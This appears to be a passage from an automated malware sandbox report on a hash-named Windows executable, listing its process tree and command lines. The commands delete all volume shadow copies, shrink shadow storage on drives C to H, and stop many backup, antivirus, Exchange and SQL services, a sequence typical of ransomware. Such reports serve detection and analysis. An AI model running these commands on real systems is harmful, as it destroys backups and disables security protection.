PID 1872 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4136 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4136 wrote to memory of 4416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4416 wrote to memory of 1464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4416 wrote to memory of 1464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4416 wrote to memory of 1464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1872 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 4776 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4776 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4776 wrote to memory of 1460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1460 wrote to memory of 2372 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1460 wrote to memory of 2372 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1460 wrote to memory of 2372 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1872 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 1872 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe C:\Windows\SysWOW64\cmd.exe
PID 2068 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe

"C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\SysWOW64\net.exe

net stop AcronisAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net.exe

net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Antivirus /y

C:\Windows\SysWOW64\net.exe

net stop Antivirus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Antivirus /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ARSM /y

C:\Windows\SysWOW64\net.exe

net stop ARSM /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ARSM /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop bedbg /y

C:\Windows\SysWOW64\net.exe

net stop bedbg /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop bedbg /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop DCAgent /y

C:\Windows\SysWOW64\net.exe

net stop DCAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop DCAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPSecurityService /y

C:\Windows\SysWOW64\net.exe

net stop EPSecurityService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPSecurityService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPUpdateService /y

C:\Windows\SysWOW64\net.exe

net stop EPUpdateService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPUpdateService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net.exe

net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EraserSvc11710 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EsgShKernel /y

C:\Windows\SysWOW64\net.exe

net stop EsgShKernel /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EsgShKernel /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop FA_Scheduler /y

C:\Windows\SysWOW64\net.exe

net stop FA_Scheduler /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop FA_Scheduler /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IISAdmin /y

C:\Windows\SysWOW64\net.exe

net stop IISAdmin /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IISAdmin /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IMAP4Svc /y

C:\Windows\SysWOW64\net.exe

net stop IMAP4Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IMAP4Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McShield /y

C:\Windows\SysWOW64\net.exe

net stop McShield /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McShield /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McTaskManager /y

C:\Windows\SysWOW64\net.exe

net stop McTaskManager /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McTaskManager /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfemms /y

C:\Windows\SysWOW64\net.exe

net stop mfemms /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfemms /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfevtp /y

C:\Windows\SysWOW64\net.exe

net stop mfevtp /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfevtp /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MMS /y

C:\Windows\SysWOW64\net.exe

net stop MMS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MMS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mozyprobackup /y

C:\Windows\SysWOW64\net.exe

net stop mozyprobackup /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mozyprobackup /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer110 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeES /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeES /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeES /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeIS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeIS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeIS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMGMT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMTA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSRS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y

